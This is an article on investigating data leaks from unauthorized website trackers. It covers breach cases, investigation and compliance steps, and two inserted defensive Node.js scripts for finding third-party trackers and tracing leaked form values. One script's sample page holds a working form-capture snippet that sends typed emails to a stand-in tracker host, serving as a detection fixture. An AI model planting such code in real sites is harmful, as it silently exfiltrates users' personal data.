Investigating data leaks
Featured Article

Investigating data leaks from fraudulent tracking technologies

By Karen Schuler, CFE, FIP, Taryn Crane, FIP
Date: July 2, 2025
Read Time: 20 mins

Unauthorized tracking technologies can steal personal data and threaten the security of company websites and applications. Here, the authors explore the benefits and disadvantages of using tracking technologies and lay out specific steps for investigating data leaks caused by unauthorized trackers.

The first indication that a retail company had been a victim of a security breach occurred in early 2023 when a customer complained that her account had been changed without her authorization. This incident set into motion an investigation that lasted five months and involved the company’s web development team, information technology and security specialists, and external forensic specialists. Ultimately, the company’s team of investigators determined that the breach hadn’t been caused by ransomware or business email compromise. Instead, investigators found unauthorized tracking technologies on the company’s website that’d been siphoning customers’ personal data to a third-party broker who then sold the data, including customers’ usernames, passwords, purchasing habits and credit card information. According to investigators, a previously undetected coding vulnerability in the company’s system invited the data breach, allowing malicious actors to inject cookies into the company’s website and collect and transfer data to an external database.

In another case last year, during its routine testing of a pharmaceutical company’s website, the web team discovered irregularities in the URL redirect for the company’s webform entries. The web team determined that its customers’ information, including sensitive information about usernames, addresses, medications and medical conditions, was unintentionally shared with unauthorized parties: the submission forms that collect customer information on the website were being redirected to an unknown party external to the company.


The investigation took six weeks to resolve as the company’s web team meticulously examined webform code, URL redirects and server logs to trace unauthorized access and detect anomalous patterns. The cause of the company’s breach was an SQL injection attack compounded by a malicious website redirect. This vulnerability enabled threat actors to manipulate the connection between the database containing sensitive information and the location of the website’s forms, redirecting data to unauthorized destinations.

These two cases illustrate the ways that fraudsters gain access to people’s personal and sensitive information through tracking technologies. Fraudsters then use the sensitive data obtained through these tracking technologies to engage in other criminal pursuits, such as identity theft and social engineering scams.

They also illustrate how tracking technologies operate covertly in the background, collecting data without anyone knowing until it’s too late and a company must now contend with unwanted litigation, reputation damage and costly investigations. Many times, these technologies fail to trigger proper notification and consent mechanisms, and malicious scripts embedded in websites and other unauthorized third-party trackers can make intrusions difficult to monitor and remediate. Knowing these technologies exist in the first place can help organizations stay vigilant to protect their customers’ personal and sensitive information. We’ll explain how these technologies track data from websites and mobile applications (aka apps) and provide best practices for investigating suspicious or unauthorized tracking technologies.

A primer on tracking technologies

Tracking technologies are pieces of code or scripts — such as cookies, pixels, beacons and tags — used to collect and analyze information about how people interact with websites and mobile apps. When an organization creates its own tracking technology, it’s known as “first-party” tracking, but third parties may also use them. Usually, website or app owners maintain domain ownership of the technologies and are responsible for the data collected, even if they use third-party service providers to manage or host sites.

If used responsibly by a company, tracking technologies can be helpful for understanding its customers. But in the wrong hands, they can be used to collect and misuse sensitive data. Tracking technologies used for fraudulent purposes are introduced to a site via scripts or malicious ad networks, and the code is obfuscated to avoid detection. Unintentional data leaks can occur with coding errors and misconfigurations. These mistakes can be traced and corrected, but they’re vulnerabilities that bad actors won’t hesitate to exploit.

Beneficial tracking technologies

As already mentioned, not all tracking technologies are created equal — some, in fact, are integral to digital marketing strategies and serve multiple functions like enhancing a customer’s experience on a website or improving the website’s performance for revenue growth.


When used responsibly, tracking technologies provide companies with deep insights into their customers’ activities. It’s through tracking technologies that companies learn about their customers’ preferences and behaviors. By analyzing data collected by tracking technologies, marketers may create personalized advertising campaigns that improve engagement with customers and conversion rates and, ultimately, deliver a greater return on investment (ROI).

Businesses often use tracking tech to develop accurate attribution models, which allow them to determine which of their marketing campaigns are most effective and how different touchpoints — or points of contact on a website — contribute to converting users to customers. 

Insights from tracking technologies provide valuable data for making strategic decisions. Analyzing user behaviors helps companies identify trends, improve products and improve the design of their websites. They also help companies glean insights into their competitors’ strategies.

Companies might also use tracking technologies to reveal inefficiencies in business processes. By identifying areas where resources are being underutilized or wasted, companies can streamline operations, reduce costs and enhance overall productivity. Data collected through tracking technologies can also help companies forecast trends and behaviors to stay ahead of market changes, optimize inventory management, and tailor their goods or services to meet anticipated demands.

And while the focus of this article is on investigating fraudulent use of tracking technologies, these technologies can actually help detect and prevent fraud. By using tracking technologies to monitor patterns and anomalies in user behavior, companies can identify suspicious activities.

Finally, organizations can also use these technologies to assist them in complying with legal and regulatory requirements. By maintaining detailed logs and records of user interactions through tracking technology, companies may meet industry standards and produce necessary documentation during audits.

The dark side of tracking technologies

This is where tracking technologies veer from useful to harmful. First, for consumers, these technologies encroach on privacy as they collect sensitive personal data such as a person’s location, health information, online-browsing habits and financial details. Poor security practices on a website can lead to identity theft and financial loss if bad actors are able to access this data. Unauthorized tracking technologies often monitor individuals without explicit consent, which erodes trust and creates a sense of constant surveillance. (See sidebar “Consent is critical for collecting personal information,” at the end of this article.) Their use also raises ethical and moral concerns, especially in sectors like law enforcement where surveillance of individuals might be necessary. If used irresponsibly without regard to citizens’ civil rights and liberties, these tracking technologies have the potential to be used for discriminatory practices that disproportionately target certain groups of people.

Bad actors misuse collected data for purposes beyond the original intent, such as using the data for targeted content and political campaigns. Additionally, some employers might use these technologies to excessively monitor employees.

Organizations that depend on tracking technologies also face problems if they fail or malfunction, disrupting work and other critical tasks. Incorrectly implementing these technologies compromises the performance and normal functioning of a website.

Moreover, implementing and maintaining tracking technologies can be costly, and businesses might decide to pass the costs on to their customers by charging more for their goods and services.

In the following sections, we’ll detail what organizations should do if they suspect that tracking technologies are the cause of data leaks.


Investigating tracking technologies

Even though unauthorized tracking is a specific type of data leak, don’t abandon traditional investigative techniques — use forensically sound, commercially available tools whenever possible. It’s also best practice to hire external forensics professionals if the organization lacks experienced in-house professionals to conduct this type of investigation.

Understand the scope of the leak

Before diving into any data leak investigation, it’s essential to understand the scope of the data leak. Gathering as much information as possible about the situation early on helps investigators identify the source of the compromise and the extent of the damage that it’s caused. Learning the full scope of the leak requires talking to the in-house digital team, asking detailed questions about the suspected event and learning the current website or mobile app configurations. Key questions to ask include:

  • What tracking technologies does the site use? (e.g., browser cookies, GPS tracking, radio frequency identification)
  • What specific data was leaked? (e.g., location data, browsing history, personal identifiers)
  • Who could gain access to this information? (e.g., third parties, bad actors)
  • How many users were affected by the leak?

Then, management will need to work with marketing, data analytics and software development teams to gather as much information as possible about how they use tracking technologies. The investigation may require collecting and analyzing network packets, log files and tag managers.

Understand the regulatory impact

When there’s a suspected data leak, organizations must consider regulations and compliance requirements. If an organization does business within the European Union (EU) it’ll need to follow reporting mandates set by the EU’s General Data Protection Regulation (EU GDPR). Entities operating in the U.S. must evaluate the breach notification protocols and thresholds that trigger mandatory disclosure to affected parties and regulatory bodies. (For more information about the EU’s GDPR, see the sidebar “Consent is critical for collecting personal information,” at the end of this article.)

While it might not be feasible to report an incident immediately, it’s vital to know the timelines and obligations necessary to fulfill compliance requirements. Organizations should maintain a comprehensive privacy-incident checklist to cover all aspects of their compliance and reporting procedures. (For more information about regulations and compliance regarding tracking technologies, see the sidebar “Compliance obligations,” at the end of this article.)

Collect data


Once management has made a full inventory of the event and its compliance requirements, it’s time to start collecting data. In many situations, companies may remove unauthorized trackers as soon as possible, but doing so means that investigators will have to recreate those trackers. To recreate these trackers, investigators may collect an archived version of the affected website or app via the Wayback Machine, then utilize a sandbox environment (a test environment) for safe analysis of the unauthorized trackers.

Fraud examiners with training in digital forensics and experience conducting these types of investigations may archive a copy of the website before the trackers are removed from the site. It may be possible to forensically replicate or collect the archived version of the website before analyzing it in a test environment.

Finally, if the website remains live and the unwanted tracking technologies are still active, investigators will need to preserve a copy of the site or necessary pages, then strip out unwanted tracking technologies from the live site.

Regardless of the method you choose, remember to work in an offline environment while conducting the analysis. Remediate the site and collect necessary log files in a forensically sound manner.

Scrutinize the website

Investigators must scrutinize the website in question with the help of the following tools. 

Browser tools: Browser developer tools can provide a detailed inspection mechanism for analyzing the elements on a webpage. They help investigators review the site for security warnings about nonsecure origins or requests. Furthermore, examiners can use these tools to identify and document suspicious tracking activities, which may involve unauthorized data collection or malicious scripts, to more comprehensively scrutinize the website’s behavior.

Scanning tools: Regular use of automated scanning tools can help identify and analyze hidden tracking technologies, such as cookies, scripts and web beacons.

Manual analysis and website inspection: Manual analysis of tracking scripts, and identifying known tracking domains and scripts that collect user data, are critical to the investigation. These procedures can uncover hidden methods of data collection that routine inspections might miss. Tracking scripts are often written in JavaScript and embedded in a website to collect data on how an individual spends their time on a digital platform: what they click on, how much time they spend there, what they browse, their location and preferences. Manual analysis can determine what data was collected or exfiltrated from the platform.

To manually analyze scripts, first inspect the website’s source code using developer website tools. Search for external scripts or embedded code from third parties, including analytics, ad networks or social media plugins. Then, review the code line by line to understand its functionality, such as how the data was collected, how it communicated with servers, and how the site is using cookies or tracking technologies. Tools like Wireshark or Fiddler monitor network requests made by the scripts.

Next, test the scripts using different scenarios to observe their behavior. In a sandbox environment, investigators will simulate user interactions or use tools that simulate a user’s journey. This is where an investigator might check that a script is respecting privacy settings like “do not track” requests. Simultaneously, the investigator researches the scripts by reviewing privacy policies and terms of service of the entities to determine whether the tracking technologies are acting appropriately. Throughout this process, the investigator documents findings and identifies data privacy, ethical or noncompliance issues.
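The inventory step described above (searching a saved copy of the page source for external scripts, pixels and frames, sorting them into first-party, third-party and known-tracker origins, and spotting inline code that watches form fields) can be scripted so that it is repeatable across every archived page. The following Node.js script is an added example written for this article, not code from the authors or from any tool they name. The sample page, the site domain example-shop.test and the tracker-domain list are all constructed for the example; in a real engagement the list would come from the marketing team’s tag inventory and a published tracker-domain list.

```javascript
// Added example: inventory the external resources a saved page loads and
// flag those outside the site's own domain. All names are constructed.

// Constructed sample page for the site example-shop.test.
const SAMPLE_HTML = `
<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.example-shop.test/vendor.js"></script>
<script src="https://analytics.tracker-one.test/collect.js" async></script>
<script>
  document.querySelector('#email').addEventListener('input', e => {
    navigator.sendBeacon('https://collect.tracker-two.test/k', e.target.value);
  });
</script>
</head><body>
<form action="/signup"><input id="email" name="email"></form>
<img src="https://pixel.tracker-two.test/p.gif?uid=123" width="1" height="1">
<iframe src="https://ads.example-network.test/frame"></iframe>
</body></html>`;

const SITE_DOMAIN = 'example-shop.test';
// Constructed list of domains nobody in the organisation authorised.
const KNOWN_TRACKER_DOMAINS = ['tracker-one.test', 'tracker-two.test'];

// True when host equals domain or is a subdomain of it (cdn.example-shop.test).
function underDomain(host, domain) {
  return host === domain || host.endsWith('.' + domain);
}

// Pull every tag that can trigger a request. A regex is adequate for an
// archived static page; on a live site use the browser's Network panel.
function extractResources(html, pageUrl) {
  const tagRe = /<(script|img|iframe|link)\b([^>]*)>/gi;
  const attrRe = /\b(src|href)\s*=\s*["']([^"']+)["']/i;
  const out = [];
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const attr = attrRe.exec(m[2]);
    if (!attr) continue; // inline <script> has no src
    const url = new URL(attr[2], pageUrl); // resolves relative paths
    out.push({ tag: m[1].toLowerCase(), url: url.href, host: url.hostname });
  }
  return out;
}

// Label each resource first-party, third-party or known-tracker.
function classifyResources(html, pageUrl, siteDomain, trackerDomains) {
  return extractResources(html, pageUrl).map(r => {
    let verdict = 'third-party';
    if (underDomain(r.host, siteDomain)) verdict = 'first-party';
    else if (trackerDomains.some(d => underDomain(r.host, d))) verdict = 'known-tracker';
    return { ...r, verdict };
  });
}

// Heuristic for inline code that both watches a form field and makes a
// network call: the pattern behind email capture before form submission.
function findInputCaptureScripts(html) {
  const inlineRe = /<script\b(?![^>]*\bsrc=)[^>]*>([\s\S]*?)<\/script>/gi;
  const hits = [];
  let m;
  while ((m = inlineRe.exec(html)) !== null) {
    const body = m[1];
    const watchesInput = /addEventListener\(\s*["'](input|keyup|keydown|change)["']/.test(body);
    const sendsData = /\b(sendBeacon|fetch|XMLHttpRequest)\b/.test(body);
    if (watchesInput && sendsData) hits.push(body.trim());
  }
  return hits;
}

// One report per page: the resources, the distinct non-first-party hosts,
// the known-tracker URLs and any suspicious inline scripts.
function summarize(html, pageUrl, siteDomain, trackerDomains) {
  const resources = classifyResources(html, pageUrl, siteDomain, trackerDomains);
  const others = resources.filter(r => r.verdict !== 'first-party');
  return {
    resources,
    thirdPartyHosts: [...new Set(others.map(r => r.host))].sort(),
    knownTrackers: resources.filter(r => r.verdict === 'known-tracker').map(r => r.url),
    inputCaptureScripts: findInputCaptureScripts(html),
  };
}

console.log(JSON.stringify(
  summarize(SAMPLE_HTML, 'https://example-shop.test/signup', SITE_DOMAIN, KNOWN_TRACKER_DOMAINS),
  null, 2));
```

Run it against each page saved from the archive or the preserved live site and diff the thirdPartyHosts lists against what the marketing team says is authorised; any host that appears in the report but not in their inventory is the starting point for the line-by-line review.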

By analyzing these elements, fraud examiners can uncover unauthorized tracking technologies embedded within a website’s source code. This process may pinpoint data leak origins and reveal how user data is being collected, stored and potentially misused. Identifying these scripts and domains can also highlight breaches in compliance with privacy regulations and help leak investigators introduce corrective measures to safeguard user information, such as encrypting cookie data to add a layer of security, limiting the cookie lifespan so that cookies expire quickly and bad actors have less time to exploit them, and obtaining consent so that users may manage their cookie settings.

Identify the source of the leak

Once investigators have collected data, they may turn to the work of identifying the source of the leak. These steps are critical to the process:

  1. Interview the team(s) responsible for developing and publishing the website.
  2. Review system logs and network traffic to trace the flow of data.
  3. Analyze access controls and permissions to determine any unauthorized access.
  4. Examine compromised devices or servers for signs of unauthorized access.

During this step of the investigation, collaboration with the organization’s digital and marketing professionals is key. Data leaks aren’t always the result of malicious activity. Sometimes they occur because of coding or management mistakes. Because mistakes can create vulnerabilities, it’s imperative to have detailed discussions with website development teams to untangle what happened. An organization’s web team should be able to explain the website architecture, coding practices and security measures to help pinpoint vulnerabilities that might’ve led to the leak.

Marketing and digital teams may offer insight into authorized tracking technologies and their intended purposes, as well as the nature of the data collected, storage practices and any third-party integrations. These teams may provide insights into user-behavior patterns, which could help determine the extent of the leak.

Review system logs and network traffic to trace the data flow

This step requires examining system logs and network traffic to identify how these unauthorized trackers accessed the site. System logs record all activities within the network, providing invaluable information to isolate anomalous behaviors or unauthorized access attempts. When warranted, investigators should capture network traffic to scrutinize data packets and trace the flow of data within the network.

We recommend capturing network traffic whenever a data leak is suspected; however, this isn’t always realistic. The following factors can help determine whether it’s necessary to capture network traffic:

If system logs or monitoring tools indicate anomalous activity, such as unauthorized access attempts or irregular patterns within the network, capturing traffic can help identify the source, nature and scope of the intrusion.

If there are indications that sensitive website data, such as cookies or user information, is being leaked, analyzing network traffic can help identify the pathways and mechanisms through which the leakage is occurring. This includes identifying whether third-party trackers or scripts are improperly accessing or transmitting data.

If the website is experiencing performance issues, monitoring network traffic can determine whether there are bottlenecks or misconfigurations that are leaving the organization’s site vulnerable. 
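Tracing the data flow means tying what the user submitted to the site’s own form to every request that later carried the same value to another host, which is exactly the pattern in the pharmaceutical webform case above. The Node.js script below is an added example written for this article, not code from the authors or from Wireshark or Fiddler; it works over a list of request records in the shape a proxy or HAR export would produce. The capture, the site domain pharma-example.test and the authorised-vendor list are constructed for the example.

```javascript
// Added example: correlate captured requests to find where submitted form
// values travelled. All hosts and records are constructed.
const SITE_DOMAIN = 'pharma-example.test';
// Hosts the marketing team confirmed are authorised third parties (constructed).
const AUTHORIZED_HOSTS = ['api.analytics-vendor.test'];

// Constructed capture from a sandbox session: one page load, the site's own
// script, a form submission, and two requests that leave the site.
const CAPTURE = [
  { method: 'GET',  url: 'https://pharma-example.test/refill', status: 200, postData: '' },
  { method: 'GET',  url: 'https://cdn.pharma-example.test/app.js', status: 200, postData: '' },
  { method: 'POST', url: 'https://pharma-example.test/refill/submit', status: 302,
    postData: 'name=Jane+Doe&email=jane%40mail.test&medication=metformin' },
  { method: 'GET',  url: 'https://collect.unknown-party.test/f?e=jane%40mail.test&m=metformin',
    status: 200, postData: '' },
  { method: 'POST', url: 'https://api.analytics-vendor.test/event', status: 204,
    postData: '{"event":"pageview","path":"/refill"}' },
];

function hostOf(url) { return new URL(url).hostname; }
function isFirstParty(host, site) { return host === site || host.endsWith('.' + site); }

// Decode form and URL encoding leniently so a value matches however it was sent.
function decodeLoose(s) {
  try { return decodeURIComponent(s.replace(/\+/g, ' ')); } catch { return s; }
}

// Values the user typed into the site's own forms (POST bodies to first-party hosts).
function submittedValues(capture, site) {
  const values = new Set();
  for (const r of capture) {
    if (r.method !== 'POST' || !isFirstParty(hostOf(r.url), site)) continue;
    for (const [, v] of new URLSearchParams(r.postData)) {
      if (v.length >= 4) values.add(v); // skip short tokens that would match by chance
    }
  }
  return values;
}

// Every host contacted that is not the site itself: the inventory step.
function thirdPartyHosts(capture, site) {
  const hosts = capture.map(r => hostOf(r.url)).filter(h => !isFirstParty(h, site));
  return [...new Set(hosts)].sort();
}

// Requests to unauthorised hosts that carried a submitted value in their
// URL or body; each entry is a concrete data-flow finding for the report.
function traceLeaks(capture, site, authorized) {
  const values = submittedValues(capture, site);
  const leaks = [];
  for (const r of capture) {
    const host = hostOf(r.url);
    if (isFirstParty(host, site) || authorized.includes(host)) continue;
    const haystack = decodeLoose(r.url) + '\n' + decodeLoose(r.postData);
    const carried = [...values].filter(v => haystack.includes(v));
    if (carried.length > 0) leaks.push({ host, url: r.url, values: carried });
  }
  return leaks;
}

console.log(JSON.stringify({
  thirdPartyHosts: thirdPartyHosts(CAPTURE, SITE_DOMAIN),
  leaks: traceLeaks(CAPTURE, SITE_DOMAIN, AUTHORIZED_HOSTS),
}, null, 2));
```

The value-matching step is deliberately simple; hashed or encoded values would need the same transform applied before comparison, so when the third-party request carries an opaque blob, run the script with the authorised list emptied and treat any unexplained host contacted right after the form submission as something to examine line by line.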

Analyze the impact

Understanding the impact of the data leak is essential to remediate the problem. To that end, investigative teams should work closely with the organization’s legal team to categorize the type of data compromised, distinguishing between personal, financial, health or other sensitive information. Identifying the types of data affected by the leak allows organizations to determine potential victims of the leaks. It’s good practice to run through a variety of scenarios to consider how bad actors could exploit data, such as stealing people’s identities or perpetrating a health care fraud scheme from misdirected prescriptions or unauthorized access to financial resources. A thorough assessment of both immediate and long-term ramifications on user privacy and security is imperative, including evaluating the likelihood of malicious entities creating fraudulent accounts to procure goods and services or orchestrating a full-scale identity theft operation.

Estimate financial losses or legal repercussions for the organization

The fallout from a data leak can be catastrophic for organizations — and not just because of financial losses. When sensitive, personal information is a concern, a company’s reputation and customer trust are on the line. Organizations must also consider the various financial, legal and public consequences that can arise from these data leakage incidents.

  • Calculate the direct financial costs of the data leak. This includes immediate expenses related to remediation, such as hiring forensic experts to contain the leak and conduct the investigation, implementing measures to prevent future leaks, and hiring legal experts.
  • Consider fines and penalties from regulatory authorities. Depending on the nature and extent of the data leak, regulators may levy substantial fines, particularly if the company is found negligent in its duty to safeguard personal and sensitive data.
  • Calculate indirect costs and their effects on the organization’s long-term viability. Data leaks can significantly damage reputation and erode customer trust, leading to potential loss of business.
  • Forecast the impact on future business and revenue. The financial strain from addressing a data leak diverts resources away from core business functions, slowing growth and innovation. Combined with lost customer trust, this can reduce sales and decrease revenue, posing a long-term threat.


Mitigate future risk

Website and mobile app data leaks pose a significant risk to companies of all sizes. Companies must take a comprehensive approach to mitigate the risks of leaks, including technical, administrative and physical measures, and conduct ongoing monitoring to address deficiencies before they become larger problems.

Companies should implement technical measures, including encryption, regular security updates, access controls and secure coding practices, as outlined in Security by Design and by Default protocols. Under these protocols, security is integrated into the design and development of systems from the start. Common principles are proactive security measures (e.g., encryption, access controls, monitoring), threat modeling to identify potential vulnerabilities and mitigate risk early in the design process, and comprehensive protection across the network, application and data layers. Additionally, privacy practices should be implemented through data protection by design and by default, which addresses privacy and data protection before a product, service or system is designed.

Organizations should implement administrative measures that include training for software development and marketing professionals, as well as other measures such as policies, checklists, backup and recovery plans, and thorough third-party risk management practices.

Physical security should include data center and hardware security. Security teams should deploy advanced access control systems using biometric authentication, such as fingerprint or retinal scans, and install high-resolution surveillance cameras for continuous monitoring of data centers. Additionally, trained security personnel should patrol and monitor the premises for enhanced security and rapid response to suspicious activities.

Notification protocols are another important aspect of mitigating future risk. Security teams should include website data leaks in the incident response plan and identify the individuals who need to be part of the response plan. For example, marketing and digital teams often have intricate knowledge of a company’s online experience and are well-suited to response teams.

If there's a data leak, it’s essential to inform individuals who are directly affected as well as any regulatory authorities as required by law. Timely notification helps mitigate damage and maintain transparency.

Preventing data leaks

Website and mobile app data leaks can significantly damage reputation, erode customer trust, and lead to decreased revenue and long-term business threats. Companies can mitigate these problems by implementing proper coding techniques, monitoring and data protection controls. Should a breach occur, organizations should follow proven investigative techniques to identify the root cause of the leak and implement sound data protection controls to avoid future risks.

Karen Schuler, CFE, FIP, is a BDO principal and the global head of privacy and data protection with 30 years of experience as an investigator and privacy professional. Contact her at kschuler@bdo.com.

Taryn Crane, FIP, is a BDO managing director and the U.S. head of privacy and data protection with 15 years of experience as a privacy and marketing technology compliance professional. Contact her at tcrane@bdo.com.


Consent is critical for collecting personal information

In a 2022 study, researchers crawled 2.8 million pages from 100,000 websites and found that as many as 1,844 European pages and 2,950 American pages allowed trackers to capture email addresses before form submissions. In this study, website visitors entered their email addresses into online forms, which were later collected by unauthorized third parties. Unauthorized collection of email addresses violates user privacy, as it involves gathering personal information without consent. Unauthorized collection of email addresses also increases the risk of data breaches and identity theft, as hackers may further exploit unauthorized data by exposing users to phishing attacks and other malicious activities.

Providing notice and obtaining explicit or implicit consent are critical components for organizations to determine whether they can collect certain types of information from users. In the U.S., courts have endorsed the practice of websites notifying visitors of their rights and providing the opportunity to accept or decline different types of tracking technologies. In recent years, regulators and plaintiffs’ attorneys have sued companies that failed to adequately inform visitors of their data privacy rights. Regulated entities in the U.S. can use or disclose protected health information without an individual’s written authorization, only as expressly permitted or required by the Health Insurance Portability and Accountability Act (HIPAA).

The European Union’s (EU) General Data Protection Regulation (GDPR) requires that all websites obtain explicit and informed user consent before deploying nonessential cookies or trackers. Websites must provide detailed information about the type of data collected and its purpose, and third-party access must be disclosed. Users may withdraw consent at any time. According to the U.K. Information Commissioner’s Office, sites only need to tell people the cookies are there, explain what the cookie does and offer an explicit opt-in. The EU ePrivacy Directive requires that websites secure user consent before using cookies, except for those strictly necessary for website functionality. Websites must have clear and accessible banners to inform customers about cookie usage and the ability to seek consent.

Compliance obligations

Multiple laws and regulations drive tracking-technology compliance and prompt companies to investigate unauthorized data sharing and data leakage. These laws and regulations span multiple sectors, agencies and regulators around the world. For example, in 2020, the French data protection authority (CNIL) fined Google LLC 60 million euros (approx. $68 million) and Google Ireland 40 million euros (approx. $46 million) for unauthorized data sharing. Additionally, CNIL fined Amazon Europe Core 35 million euros (approx. $40 million) for violating the ePrivacy Directive, which requires the communications sector to comply with certain website compliance obligations. In January 2023, CNIL fined TikTok 5 million euros (approx. $5.7 million) for failing to provide an easy cookie refusal option and sufficient transparency regarding their purposes in violation of French data protection laws.
